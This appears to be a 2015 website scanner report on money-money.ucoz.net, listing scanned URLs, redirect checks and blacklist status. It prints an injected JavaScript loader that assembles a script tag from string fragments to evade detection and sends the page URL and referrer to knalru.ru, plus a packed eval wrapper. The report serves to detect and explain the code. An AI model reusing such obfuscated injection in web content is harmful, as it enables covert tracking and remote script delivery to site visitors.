Scanned pages/files
Request | Server response | Status |
http://money-money.ucoz.net/ | 200 OK Content-Length: 27582 Content-Type: text/html | malicious |
    Malicious code - confirmed by antiviruses (see below). The injected loader assembles a <script> tag from string fragments ('<scr' + 'ipt', 'kna' + 'lru.ru') so that a plain search for "<script" or for the domain name does not match, reports the page URL and referrer to the remote endpoint, and appends a random cache-buster:

    var lankru_html = '';
    lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" ';
    lankru_html += 'src="http://kna' + 'lru.ru/js.php?id=7089';
    lankru_html += '&dd=3&url=' + encodeURIComponent(document.location);
    lankru_html += '&ref=' + encodeURIComponent(document.referrer);
    lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>';
    document.write(lankru_html);

    Reassembled, this writes <script language="JavaScript" src="http://knalru.ru/js.php?id=7089&dd=3&url=<page URL>&ref=<referrer>&rnd=<random>"></script> into the page.
    Antivirus reports: none are listed on this page.
http://libertytraffic.ru/selljs/?id=42 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 18 Jul 2015 03:41:46 GMT Location: http://www.libertytraffic.ru/selljs/?id=42 Server: Apache/2.2.15 (CentOS) Content-Length: 333 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.libertytraffic.ru/selljs/?id=42 | 200 OK Content-Length: 2705 Content-Type: text/html | clean |
http://www.libertytraffic.ru/test404page.js | 404 Not Found Content-Length: 2013 Content-Type: text/html | clean |
http://www.libertytraffic.ru/files/scripts.js | 200 OK Content-Length: 20001 Content-Type: text/javascript | malicious |
    Malicious code - confirmed by antiviruses (see below). The file starts with p,a,c,k,e,r output, i.e. an eval(function(p,a,c,k,e,r){...}) wrapper whose payload is only decoded at run time. The listing breaks off inside that payload; what is readable in it (hs.graphicsDir, hs.outlineType, hs.preloadImages and Russian UI strings) is Highslide-gallery configuration. The scanner rendered the Windows-1251 strings as Latin-1 mojibake; they are restored here ('Развернуть во всю величину' is "Expand to full size", 'Нажмит' is the start of "Click"):

    eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('k c={3z:\'12/7G/\',4r:"8l.5p",2P:\'7J.7F\',67:10,5N:70,6P:10,6G:70,6B:S,6v:S,4S:1,2B:17,5u:3,3K:10,5T:35,5F:10,5C:35,3y:8b,6M:\'Развернуть во всю величину\',5o:\'Нажмит

    (listing breaks off here; it resumes with unpacked code from the same file)

    hs.graphicsDir = '';
    hs.outlineType = '';
    window.onload = function() { hs.preloadImages(1); }
    function popUP(url,width,height) {
        if(!width) { width = 600; }
        if(!height) { height = 400; }
        var posx = 200;
        var posy = 200;
        var w=window.open(url,'wind','left='+posx+',top='+posy+',width='+width+',height='+height+',status:no, help:no');
        return false;
    }

    Antivirus reports: none are listed on this page.
http://www.libertytraffic.ru/ | 200 OK Content-Length: 23449 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://www.libertytraffic.ru/cap/jsstuff/jquery.cycle.all.js | 200 OK Content-Length: 52236 Content-Type: text/javascript | clean |
http://www.libertytraffic.ru/cap/jsstuff/jquery.topheader.js | 200 OK Content-Length: 2796 Content-Type: text/javascript | clean |
http://www.libertytraffic.ru/scripts/jquery.easyAccordion.js | 200 OK Content-Length: 6801 Content-Type: text/javascript | clean |
http://www.libertytraffic.ru/scripts/utility.js | 200 OK Content-Length: 449 Content-Type: text/javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 260803 Content-Type: text/javascript | clean |
http://u.begun.ru/begun.js | 200 OK Content-Length: 3793 Content-Type: application/x-javascript | clean |
http://www.libertytraffic.ru/unlimited/ | 200 OK Content-Length: 41917 Content-Type: text/html | clean |
http://www.libertytraffic.ru/unlimited/jquery/jquery.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: money-money.ucoz.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 18 Jul 2015 03:41:46 GMT
Server: uServ/3.2.2
Content-Length: 27582
Content-Type: text/html; charset=UTF-8
...27582 bytes of data.
Second query (visit from a search engine: the same request with a Google search Referer, which catches redirects served only to search-engine traffic):
GET / HTTP/1.1
Host: money-money.ucoz.net
Referer: http://www.google.com/search?q=money-money.ucoz.net
Result:
The response is similar to that of the first query; no suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=money-money.ucoz.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://money-money.ucoz.net/
Result: money-money.ucoz.net is not infected or malware details are not published yet.